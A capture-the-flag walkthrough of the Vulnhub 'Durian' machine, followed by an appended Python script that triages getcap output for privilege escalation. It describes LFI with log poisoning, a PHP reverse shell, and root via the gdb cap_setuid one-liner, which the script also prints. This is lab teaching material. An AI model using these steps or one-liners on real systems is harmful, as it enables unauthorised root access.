Where Notes Work
Durian Vulnhub
Walkthrough of Durian Vulnhub.
In this post I'll show you how I solved the Durian box from Vulnhub; basically, this is a walkthrough of Durian.
Machine IP: 192.168.43.184
Running nmap, I found a website on port 80; apart from that I didn't find anything vulnerable or suspicious.
Note: a WordPress site is also running under the /blog path.
After brute-forcing the web directories, I found a cgi-data page that redirects to a page vulnerable to LFI.
Requesting /etc/passwd through it confirmed that it is vulnerable to LFI.
After spending some time and doing some research, I found a log file named durian.log that can be poisoned; access.log inside it is where the web requests are recorded.
log path: /var/log/durian.log/access.log
Then, using Burp Suite, I injected a PHP payload into a request so that it was written to the log, and included the log through the LFI to execute commands. It worked.
Note: it may take 2-8 attempts before the command actually executes.
Once the response showed command output, I tried to upload php-reverse-shell to /var/www/html/, but that did not work. After many tries I uploaded the shell to /var/www/html/blog/ instead (presumably the document root is not writable by the web user, while the blog directory is), and it got uploaded.
Then start a Netcat listener and execute shell.php by visiting it under /blog on the website: 192.168.43.184/blog/shell.php.
Now we have a shell as www-data, the web server user. I looked for suspicious configurations but didn't find anything,
but checking file capabilities, I found that two binaries have capabilities set,
and searching "/usr/bin/gdb = cap_setuid+ep" on Google showed that it can be used for privilege escalation simply by setting the uid to 0. More detailed information about Linux privilege escalation using capabilities can be found here,
$ /usr/bin/gdb -nx -ex 'python import os;os.setuid(0)' -ex '!sh' -ex quit
See, we got root. The tricky part of this box is finding the log file.
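The capability check above, as an added example that is not part of the post: a small triage script for `getcap -r /` output that handles both output styles (libcap before 2.41 prints "path = caps+flags", newer versions print "path caps=flags"), flags the capabilities known to be abusable on their own, and prints a one-liner for the cap_setuid case. The gdb one-liner is the command from the post; the python one is the equivalent well-known trick. The sample output below is constructed, not captured from the box (the post only names gdb).

```python
import os
import re
import subprocess
import sys

# Capabilities that let a binary cross a privilege boundary by itself.
ABUSABLE = {
    "cap_setuid": "binary can call setuid(0) (the gdb case in the post)",
    "cap_setgid": "binary can switch to any group, e.g. shadow",
    "cap_dac_read_search": "bypass read permission checks, e.g. read /etc/shadow",
    "cap_dac_override": "bypass write permission checks, e.g. write /etc/passwd",
    "cap_sys_admin": "mount and other administrative operations",
    "cap_sys_ptrace": "attach to processes running as root",
    "cap_sys_module": "load kernel modules",
}

# One-liners for cap_setuid; the gdb one is the command used in the post.
SETUID_HINTS = {
    "gdb": "gdb -nx -ex 'python import os;os.setuid(0)' -ex '!sh' -ex quit",
    "python": "python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'",
}

# Constructed sample of `getcap -r / 2>/dev/null` output (not from the box),
# mixing the old "path = caps+flags" and new "path caps=flags" formats.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gdb = cap_setuid+ep
/usr/bin/python3.7 cap_setuid=ep
/usr/bin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/arping cap_net_raw=p
"""

# One capability set: comma-separated names, then "+flags" (old) or "=flags" (new).
CAPSET_RE = re.compile(r"([a-z0-9_,]+)[+=]([eip]+)")


def parse_getcap(text):
    """Parse getcap output into [(path, [(cap, flags), ...]), ...].

    Paths containing spaces are not handled; getcap does not quote them.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ")          # drop the old format's " = " separator
        caps = []
        for names, flags in CAPSET_RE.findall(rest):
            caps.extend((name, flags) for name in names.split(","))
        entries.append((path, caps))
    return entries


def hint_for(path, cap):
    """Return a ready-to-run setuid(0) one-liner for known binaries, else None."""
    if cap != "cap_setuid":
        return None
    base = os.path.basename(path)
    for prog, cmd in SETUID_HINTS.items():
        if base.startswith(prog):
            return cmd.replace(prog, path, 1)
    return None


def find_privesc(text):
    """Flag abusable capabilities. 'effective' is False for a bare +p set, in
    which case the program has to raise the capability itself before use."""
    hits = []
    for path, caps in parse_getcap(text):
        for cap, flags in caps:
            if cap in ABUSABLE:
                hits.append({"path": path, "cap": cap, "flags": flags,
                             "effective": "e" in flags, "why": ABUSABLE[cap],
                             "hint": hint_for(path, cap)})
    return hits


def run_getcap():
    """Run getcap -r / on this host; empty string if getcap is missing."""
    try:
        return subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL, text=True).stdout
    except FileNotFoundError:
        return ""


if __name__ == "__main__":
    text = SAMPLE if "--sample" in sys.argv else run_getcap()
    for h in find_privesc(text):
        print(f"{h['path']}: {h['cap']}+{h['flags']} ({h['why']})")
        if h["hint"]:
            print("  try:", h["hint"])
```

Run it with --sample to see the triage on the constructed lines, or without arguments on a target to parse the real getcap output; for the post's box it would flag /usr/bin/gdb and print the exact command used above.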
If you face any problem, let me know in the comment section.